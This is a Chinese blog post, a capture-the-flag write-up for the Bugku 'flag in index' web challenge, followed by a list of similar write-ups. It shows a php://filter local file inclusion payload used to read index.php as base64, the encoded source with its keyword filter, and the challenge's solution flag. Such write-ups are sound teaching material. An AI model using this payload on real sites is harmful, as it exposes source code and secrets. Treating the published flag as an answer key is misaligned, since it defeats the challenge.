bugku flag在index里

最新推荐文章于 2020-03-09 00:09:28 发布
最新推荐文章于 2020-03-09 00:09:28 发布
阅读量5.1k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anjiaowangmenghan/article/details/76502273
版权

首先进去界面是一个这样的界面


我们点击后发现网址变成了http://120.24.86.145:8005/post/index.php?file=show.php

这里我们看到了file关键字

于是我们就想到了php://filter

如果不懂的话这里给大家一篇博客

点击打开链接

所以我们把网址改为

http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

便能得到一串base64加密后的字符串

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==
然后我们进行解密


就拿到了flag

flag{edulcni_elif_lacol_si_siht}


俺叫王梦涵
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugkuctf解题-WEB
05-04
在CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
BugkuCTF–flagindex
超人学飞的日子
06-05 4万+
题目地址http://120.24.86.145:8005/post/这道题目有经典的本地文件包含漏洞+php伪协议的结合应用点击后注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php这是一个典型的文件包含漏洞,(file关键字是提示,其实也是CTF的套路)。这用到了php的封装协议:http://php.net/ma...
CTF之Bugku flagindex
weixin_41607190的博客
10-08 1031
这是一道重新温习的题,直接来看。 “点我?不” 我就点!基本操作还是要看看源代码的,不过这个没什么好看的就不贴图了。 点完后发现URL后面有个 file=balabalabala 的,就联想到php://filter 不明白为什么会这样联想的就看看这个文章。 简单来说就是查看网页同一目录下的另一个文件。 怎么查看呢? 在file=后面加上这样一个语句php://filter/read=conv...
bugkuctf——flag就在index
weixin_40980428的博客
03-30 1948
打开链接后看到一串英文字符“点我?不”,点开看看发现了file参数原来是文件包含漏洞,通过php://filter读取index源码-->php://filter/read=convert.base64-encode/resource=index.phpburp,然后将其进行base64解密得到flag...
bugku web flagindex
thinszx的博客
03-09 251
题目描述 看到了点击以后的url,尝试了一下?file=index.php,结果失败,啥都没有,上网搜了一下题解,发现这是php中的伪协议 php伪协议 在php中,有
Bugku——flagindex
王嘟嘟的博客
11-03 1057
0x00 前言 今日份CTF奉上,这到底涉及到的伪协议是真的不懂呀。 题目 0x01 start 我一直都相信就算有什么东西不会,但是请把你能做好的每一点都做好,比如说xxxx这个东西你根本不会,你首先要做的就是把xxxx这个名字的意思查清楚,虽然很蠢,但是也是一中态度。 点开链接进行查看 点一下click me进行尝试。 发现这很明显的提示file=xxxx 知道是文件包含,但是怎么利用...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
解析bam文件中flag标签
02-10
解析bam文件中flag标签
wuxinghongqi.rar_flag
09-23
标题中的“wuxinghongqi.rar_flag”可能是指一个与五星红旗相关的编程挑战或竞赛题目,其中“rar_flag”可能暗示着解压文件后会得到一个“flag”,在编程竞赛中通常代表解决任务后的标志或答案。描述提到这是一个用...
AWD自动提交flag脚本
05-14
【AWD自动提交flag脚本】是用于网络安全竞赛(如Capture The Flag,简称CTF)中的自动化工具,特别是在 Automated Web Defense(AWD)类型的比赛中。这类脚本的主要目的是提高效率,减少手动操作,使得参赛者能够...
bugku_web flagindex
didid_w的博客
05-01 584
打开网页:点击之后url变成了:看到?file=show.php在结合题目 flagindex 很容易想到文件包含试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤通过php伪协议利用PHP://filter/read=c...
flagindex,php://filter协议
wssmiss的博客
03-06 733
题目连接http://123.206.87.240:8005/post/ 题目 点击之后出现 地址栏:http://123.206.87.240:8005/post/index.php?file=show.php 观察此题的切入点应该在文件包含漏洞,而且是php ...
BugkuCTF:flagindex;输入密码查看flag
s0il的博客
02-16 3090
flagindex 题目是这样:                                          点击之后是这样:                                              url变成了: http://123.206.87.240:8005/post/index.php?file=show.php 看到大佬的解答,因为有fil...
CTF/CTF练习平台-flagindex【php://filter的利用】
Sp4rkW的博客
08-20 4万+
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://12...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
【JavaScript】表单即时验证,不成功不让提交
编程记录,亲测有效
10-25 3万+
不能再让表单在提交按钮之后才被验证了!你输入的任何信息表单都会即时反应! 这个JavaScript的关键是onCheck()事件,使用onKeyUp()事件完成是不行的,人家没有输入完毕,你就说人家不对,多不友好啊╮(╯▽╰)╭ 一、基本目标 一个表单认证页,如果输入的用户名超过10位则会立即在输入框旁边弹出提示: 如果密码少于6位,而且两次输入密码不一致同样弹出提示,
CTF/CTF练习平台-welcome to bugkuctf【php://filter及php://input】
Sp4rkW的博客
09-01 3万+
原题内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($...
[Bugku]密码???[writeup]
skysys的研究小屋
05-21 4436
姓名:张三 生日;19970315KEY格式KEY{xxxxxxxxxx}KEY{zs19970315}一猜即中。
bugku 【社工】
一个小白的博客
03-16 8576
·密码姓名:张三生日;19970315KEY格式KEY{xxxxxxxxxx看见了题目以后,试着猜了猜,猜出了flag(姓名+生日),XD·信息查找直接百度bugku.cn!·简单个人信息收集zip伪加密  gg    社工库查询 gg·社工进阶name:孤长离提示:弱口令百度后,发现一个贴吧,然后看见他的帖子有个邮箱!弱口令密码【!】·简单的社工尝试网上wp,google识图+检索信息goon...
flag在python中用法
最新发布
09-06
在 Python 中,`flag` 通常指一个布尔型变量,用于表示某个条件是否满足。在程序中,可以通过不断修改 `flag` 的值来控制程序的流程。 下面是一个简单的示例代码,演示了 `flag` 的使用方法: ```python flag = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值